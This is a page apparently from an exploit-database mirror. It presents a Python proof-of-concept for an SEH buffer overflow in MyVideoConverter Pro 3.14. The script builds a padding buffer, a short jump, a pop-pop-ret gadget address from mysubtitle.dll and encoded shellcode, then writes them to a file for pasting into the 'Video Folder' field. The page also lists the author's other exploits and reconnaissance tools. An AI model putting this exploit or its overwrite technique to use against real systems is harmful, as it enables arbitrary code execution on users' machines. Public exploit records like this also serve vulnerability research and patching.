Search for hundreds of thousands of exploits

"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"

Author

Exploit author

ZwX

Platform

Exploit platform

windows

Release date

Exploit published date

2020-02-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-11
#Vendor Homepage : http://www.ivideogo.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
#2. Just copy the text inside "Shell.txt".
#3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" .
#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004f3e3)
#0x1004f3e3 : pop ebx # pop esi # ret  |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("Shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release DateTitleTypePlatformAuthor
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-06"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path"localwindowsZwX
2020-01-13"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions"localwindowsZwX
2020-01-09"MSN Password Recovery 1.30 - XML External Entity Injection"localxmlZwX
2020-01-09"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)"doswindowsZwX
2020-01-06"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path"localwindowsZwX
2019-12-18"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow"localwindowsZwX
2019-12-18"XnView 2.49.1 - 'Research' Denial of Service (PoC)"doswindowsZwX
2019-12-05"Amiti Antivirus 25.0.640 - Unquoted Service Path"localwindowsZwX
2019-12-05"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path"localwindowsZwX
2019-12-04"Microsoft Visual Basic 2010 Express - XML External Entity Injection"localxmlZwX
2019-11-29"SpotAuditor 5.3.2 - 'Name' Denial of Service"doswindowsZwX
2019-11-29"SpotAuditor 5.3.2 - 'Key' Denial of Service"doswindowsZwX
2019-11-27"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)"doswindowsZwX
2019-11-27"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)"doswindowsZwX
2019-11-22"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path"localwindowsZwX
2019-11-22"LiteManager 4.5.0 - Insecure File Permissions"localwindowsZwX
2019-11-19"XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service"doswindowsZwX
2019-11-19"BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path"localwindowsZwX
2019-11-18"MobileGo 8.5.0 - Insecure File Permissions"localwindowsZwX
2018-09-13"Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)"doswindows_x86ZwX
2018-09-13"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow"localwindowsZwX
2018-08-29"R 3.4.4 - Buffer Overflow (SEH)"localwindowsZwX
2016-12-16"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection"webappsphpZwX
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48054/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.